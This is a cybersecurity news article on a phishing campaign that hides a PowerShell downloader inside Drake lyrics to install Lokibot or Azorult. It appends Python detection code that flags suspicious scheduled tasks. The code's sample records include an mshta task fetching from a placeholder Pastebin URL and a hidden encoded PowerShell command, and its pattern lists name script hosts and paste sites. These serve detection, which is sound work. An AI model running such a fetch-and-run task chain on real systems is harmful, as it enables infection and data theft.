
Kiki do you love me; a Drake song is used to hack devices and steal information

We all like music, even cybercriminals. A report from cybersecurity firm AppRiver mentions that a malware campaign deployed via PowerPoint contains the lyrics to ‘In My Feelings’, by popular artist Drake, hiding a PowerShell command.

The hacker, who calls himself “Master X”, infects his targets with one of two malware families: Lokibot, an information-stealing malware variant, or Azorult, a Remote Access Trojan (RAT). Apparently the hacker first analyzes the characteristics of the infected system and then chooses the appropriate malware variant.

In its report, the cybersecurity firm indicates that the attack begins with a phishing email targeting companies previously selected for the attack. This email contains PowerPoint attachments loaded with malware.

A sample of the email sent by the hacker
SOURCE: AppRiver

When the victim opens the attachment, it runs a script that uses the Microsoft HTML application host to redirect the user to a shortened URL and evade the web browser’s own security protections.

A scheduled task is then created that reaches out to the Pastebin URL every 60 minutes to retrieve a script that decides whether the user will be infected with Lokibot or Azorult. When the script is decoded and translated into a PowerShell script, a snippet of the lyrics of the popular song (Kiki do you love me) can be seen as part of the infection process.
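The chain described above leaves a recognizable footprint on the endpoint: a scheduled task whose action is a script host, whose command line points at a paste site or carries an encoded PowerShell command, and which repeats hourly. The following detection logic is an added example for this article, not code from AppRiver’s report; it runs over constructed task records loosely modelled on Windows “scheduled task created” telemetry (names, paths and the URL are placeholders).

```python
import re
from typing import Dict, List, Optional

# Constructed sample records, loosely modelled on Windows "scheduled task
# created" telemetry: task name, action binary, arguments, trigger interval.
SAMPLE_TASKS = [
    {"name": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
     "command": r"C:\Windows\System32\usoclient.exe", "args": "StartScan",
     "interval": "P1D"},
    {"name": r"\WinUpd", "command": r"C:\Windows\System32\mshta.exe",
     "args": "https://pastebin.com/raw/PLACEHOLDER", "interval": "PT1H"},
    {"name": r"\Sync", "command": "powershell.exe",
     "args": "-w hidden -enc AAAAAAAAAAAAAAAAAAAA", "interval": "PT60M"},
    {"name": r"\Backup", "command": r"C:\Tools\backup.exe",
     "args": "--full", "interval": "PT1H"},
]

# Script hosts that legitimate software rarely schedules directly.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
PASTE_SITE = re.compile(r"pastebin\.com", re.I)
ENCODED_PS = re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand)?\b", re.I)


def interval_minutes(iso: str) -> Optional[int]:
    """Convert a task-XML duration such as PT1H, PT60M or P1D into minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?)?", iso)
    if not m or not any(m.groups()):
        return None
    days, hours, mins = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + mins


def task_indicators(task: Dict[str, str]) -> List[str]:
    """Return the reasons a task resembles the mshta/Pastebin/PowerShell chain."""
    binary = task["command"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if binary in SCRIPT_HOSTS:
        reasons.append(f"script host {binary} launched by a scheduled task")
    if PASTE_SITE.search(task["args"]):
        reasons.append("task action fetches its payload from a paste site")
    if ENCODED_PS.search(task["args"]):
        reasons.append("encoded PowerShell command line")
    if binary in SCRIPT_HOSTS and interval_minutes(task["interval"]) == 60:
        reasons.append("hourly repetition, consistent with polling a remote script")
    return reasons


def suspicious_tasks(tasks: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each suspicious task name to its indicators; benign tasks are omitted."""
    flagged = {t["name"]: task_indicators(t) for t in tasks}
    return {name: why for name, why in flagged.items() if why}
```

Run against real telemetry, the same checks would be fed from Security event 4698 or Sysmon task-creation records; the hourly interval alone is not suspicious, which is why it only counts when paired with a script host.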

Screenshot of the PowerShell script containing the song’s lyrics
SOURCE: AppRiver

Finally, this script downloads a malicious executable file called calc.exe to complete the infection process. In the report, the cybersecurity firm mentions that there is no certainty about the attack’s success rate, as so far very few cases of infection are known. The truth is that the few users who managed to detect the script were reportedly surprised by the hacker’s twisted sense of humor in using the song fragment.

However, experts from the International Institute of Cyber Security (IICS) mention that this is an advanced malicious development because, based on the features of the target system, Master X can choose which malware variant to infect the victim with, a clear sign of the complexity of the attack. Although only a few cases have been reported, users are advised to remain alert to any hacking attempts and to ignore emails of illegitimate appearance or with unsolicited attachments.
